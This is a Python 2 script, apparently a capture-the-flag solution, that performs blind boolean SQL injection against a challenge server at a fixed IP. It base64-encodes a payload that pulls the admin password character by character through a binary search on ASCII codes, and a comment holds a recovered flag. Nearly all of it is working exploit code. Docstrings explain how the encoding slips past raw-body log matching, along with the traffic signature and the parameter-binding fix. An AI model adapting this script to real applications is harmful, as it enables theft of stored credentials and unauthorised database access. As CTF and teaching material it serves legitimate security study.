- import base64
- import math
- import requests
def make_request(sqlstr):
    """POST `sqlstr` to the challenge server and return the response.

    The string is base64-encoded and sent as the `spy_name` form field.
    Because the field travels encoded, request inspection or log searches
    that match on the raw body will not see any SQL text; the field has to
    be decoded before it is matched.
    """
    encoded = base64.b64encode(sqlstr)
    form = {'spy_name': encoded}
    return requests.post('http://128.199.224.175:24000', data=form)
def check_request(sqlstr):
    """Return True when the response to `sqlstr` contains the marker text.

    The marker sentence is used as a yes/no signal: presumably the page only
    shows it when the query still returns a row, i.e. when the injected
    condition held (TODO confirm against the server). A page whose content
    differs with the truth of an attacker-supplied condition is what lets
    data be read out one comparison at a time.
    """
    marker = 'Are commanded him convinced dashwoods did estimable'
    response = make_request(sqlstr)
    return marker in response.content
def build_injection(index, comparison):
    """Build the search string that tests one character of the admin password.

    The result has the form
    `%' and ascii(substring((<subquery>),<index>,1))<comparison> limit 1#`,
    where `index` is the 1-based character position and `comparison` is an
    operator plus a number such as '<79' or '=65'.

    The leading `%'` presumably closes a quoted LIKE pattern in the server's
    query, and the trailing `#` starts a MySQL comment that discards the rest
    of the statement (server code is not shown; inferred from the payload).
    This only works if the decoded `spy_name` value is concatenated into the
    SQL text; binding it as a query parameter removes the issue.
    """
    prefix = "%' and ascii(substring((select password from users where username = 'admin'),"
    pieces = [prefix, str(index), ",1))", comparison, " limit 1#"]
    return "".join(pieces)
# Not a brute force: the range of possible character codes is halved on every
# request (binary search), which also keeps the load on the server low.
# From the server's side this shows up as a short burst of near-identical
# POSTs per character position, differing only in the compared number.
def guess(index, low, high):
    """Return the character code at position `index`, searched in [low, high].

    Each step asks whether the code is below the midpoint and recurses into
    the matching half. Once only two candidates remain, each is confirmed
    with an equality test; if neither matches, a bare Exception is raised.
    Progress is printed as the range narrows (Python 2 print statements).
    """
    if high - low == 1:
        # Two candidates left: confirm by equality, lower one first.
        for candidate in (low, high):
            if check_request(build_injection(index, '=' + str(candidate))):
                return candidate
        raise Exception()

    pivot = int(math.floor((low + high) / 2))
    below_pivot = check_request(build_injection(index, '<' + str(pivot)))
    if below_pivot:
        print '#', index, ': ', low, ' - ', pivot
        return guess(index, low, pivot)

    print '#', index, ': ', pivot, ' - ', high
    return guess(index, pivot, high)
# key = "pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}"
# Recover the value one character at a time, starting after the known 'pctf{'
# prefix. Positions are 1-based because they are passed to SQL substring().
# NOTE(review): the paste lost its indentation; the placement of the trailing
# prints below follows the most likely reading (progress print per character,
# final print after the loop).
key = 'pctf{'
length = 40 # pctf{L31___________________________}
first_unknown = len(key) + 1
for position in xrange(first_unknown, length):
    try:
        # Printable ASCII range: codes 32 through 127.
        code = guess(position, 32, 127)
        key += chr(code)
    except Exception:
        # No candidate matched: show what was recovered and wait for Enter.
        print key
        raw_input()
    print key
print key